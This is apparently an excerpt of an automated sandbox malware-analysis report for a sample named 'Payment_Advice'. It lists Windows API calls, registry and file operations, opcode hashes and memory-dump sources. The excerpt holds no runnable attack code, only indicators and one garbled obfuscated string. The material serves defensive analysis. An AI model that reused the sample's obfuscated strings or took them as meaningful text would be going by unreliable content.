                                                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                  • API String ID: 2738559852-2559241417
                                                  • Opcode ID: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction ID: bc424be8b840dd139efea3d7e203f87911aff5df88b68b997cf3f66dc638529d
                                                  • Opcode Fuzzy Hash: 706c1f52c55adc451273f1d2a5d46862a6587a7fe095f8bbabcbc32b8b015297
                                                  • Instruction Fuzzy Hash: 25E0EC3261425AABDF50AEA59C04EEB7B6CFB05360F044432F915E7190D631F921ABA9
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                  • Instruction ID: f7aa54b913f5ca68b4de92db4f2492a915771a0f44b2d9fd206d2c7cbab0d3a4
                                                  • Opcode Fuzzy Hash: c61a7965c9618faeb417bc3a597272482dc455235e96daa415df5349b26d071e
                                                  • Instruction Fuzzy Hash: B501F431724210ABE7295B789C05B6A3698E720314F10853FF911F72F1DA78DC138B4D
                                                  APIs
                                                    • Part of subcall function 00402C42: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C6A
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F2
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022FB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteOpenValue
                                                  • String ID:
                                                  • API String ID: 849931509-0
                                                  • Opcode ID: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                                  • Instruction ID: 6cfe575b1e931931ae6cf9a5ddb5ae5b21c85a020fc8f89310b59cc06b76a7bd
                                                  • Opcode Fuzzy Hash: 36ef5da6fbfc07e8a15b968ecea78d0f55385d49df1121e4a03b4c1c669af082
                                                  • Instruction Fuzzy Hash: E4F0AF72A04210ABEB01AFA18A8EAAE73689B14314F60043BF501B71C0C9BC5D02862A
                                                  APIs
                                                  • OleInitialize.OLE32(00000000), ref: 00405275
                                                    • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                  • OleUninitialize.OLE32(00000404,00000000), ref: 004052C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: InitializeMessageSendUninitialize
                                                  • String ID:
                                                  • API String ID: 2896919175-0
                                                  • Opcode ID: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                                  • Instruction ID: 554e103746b9e2db7aaf45f87dc76b5a043826cfff103a1ab0517efa01412f9c
                                                  • Opcode Fuzzy Hash: af2aeeadcd52dffc57fc188a5948419f293eac36f005212a773a20406220c2cd
                                                  • Instruction Fuzzy Hash: 8FF090B6645600EBF62157549D05B677364EFE0300F1948BEEE44B22A1D7794C428F6D
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
                                                  • Instruction ID: 0a70c1ef7b0b049098d210b4544fd1cb3982b30fa54b0c42b808752cdcd1ba25
                                                  • Opcode Fuzzy Hash: 5d4edafec38fd2beb48ef5d0e9a47d4925bced023b06079ab6e9292498eaacb4
                                                  • Instruction Fuzzy Hash: 15E08CB2B04100DBD710AFA5AA8899D3378AB90369B60087BF502F10D1C6B86C008A7E
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                  • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                  • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405734,?,?,00000000,0040590A,?,?,?,?), ref: 00405B34
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405B48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                  • Instruction ID: d8ea778f90f6dc502634cdc114c7d77142f0ebe51d0822ef38570996ea54cda0
                                                  • Opcode Fuzzy Hash: 602326d4d9bd9ed3cd650c2996e001abd569afca198e3c7fdfe54113d0d0341f
                                                  • Instruction Fuzzy Hash: 0AD01272D09020AFC6102728EE0C89BFF69EB54371B018B31FD75A22F0C7305C52CAA6
                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                                                  • Instruction ID: 9dcfef7e452db0a7b9eae0ecc372c740654949990ed8f849d8faaf285a661dbe
                                                  • Opcode Fuzzy Hash: 9c7ebf92a56fcc8e7e7cbcd5b1c4f40daf8b8ace81dd7006eb4a329e7acb9613
                                                  • Instruction Fuzzy Hash: 8BD012B2708100D7DB10DFA59A0899D77749B15325F700977E101F21D0D2B895519A2A
                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                  • Instruction ID: 304cb8fb4d97a3357204857f1077e8b7844848a30fb901da7665e9cff7ac5a83
                                                  • Opcode Fuzzy Hash: 6744d7277f212479a905977dd6ad3f82a54aba672d76c2e2143d30a0699dc345
                                                  • Instruction Fuzzy Hash: A1C09B717443017BEE308B509D49F1777546794B40F144439B344F50D4C774E451D61D
                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,00403F8E), ref: 00404170
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                  • Instruction ID: f15b28e5f211e7e8d1db6812d8cffd834990aabd0fd5fa3204c122ebb67abe5b
                                                  • Opcode Fuzzy Hash: 7da09c7c9c972ac789da334295fdd31a978bd1861dc1653affe8cad2486e61eb
                                                  • Instruction Fuzzy Hash: 2BB01235684202BBEE314B00ED0DF957E62F76C701F008474B340240F0CAB344B2DB09
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                  • Instruction ID: 9708a756cc2c9ae94551e8e9c592081b607f980c3267f7876f2ac268d6c84cd7
                                                  • Opcode Fuzzy Hash: 3f2450370ff6ec370cb83e2696936d8051f71d6c0ea90f8f087f694b7f33879c
                                                  • Instruction Fuzzy Hash: B8B01231584200BFDA214F00DE05F057B21A790700F10C030B304381F082712420EB5D
                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00403F27), ref: 00404159
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                  • Instruction ID: 866da2961ca677aab693f91c7c1a68d27da85f1a7500f820b7212f7e549623fc
                                                  • Opcode Fuzzy Hash: d4a9609eba58a6edab031f960674205c4c57b6a31959d3d39446ece1986c9a37
                                                  • Instruction Fuzzy Hash: 62A00276544101ABCB115B50EF48D057B62BBA47517518575B1455003486715461EF69
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404B26
                                                  • GetDlgItem.USER32(?,00000408), ref: 00404B31
                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7B
                                                  • LoadBitmapW.USER32(0000006E), ref: 00404B8E
                                                  • SetWindowLongW.USER32(?,000000FC,00405106), ref: 00404BA7
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBB
                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCD
                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE3
                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BEF
                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C01
                                                  • DeleteObject.GDI32(00000000), ref: 00404C04
                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C2F
                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3B
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD1
                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFC
                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D10
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404D3F
                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4D
                                                  • ShowWindow.USER32(?,00000005), ref: 00404D5E
                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5B
                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC0
                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED5
                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EF9
                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F19
                                                  • ImageList_Destroy.COMCTL32(?), ref: 00404F2E
                                                  • GlobalFree.KERNEL32(?), ref: 00404F3E
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB7
                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405060
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040506F
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0040508F
                                                  • ShowWindow.USER32(?,00000000), ref: 004050DD
                                                  • GetDlgItem.USER32(?,000003FE), ref: 004050E8
                                                  • ShowWindow.USER32(00000000), ref: 004050EF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
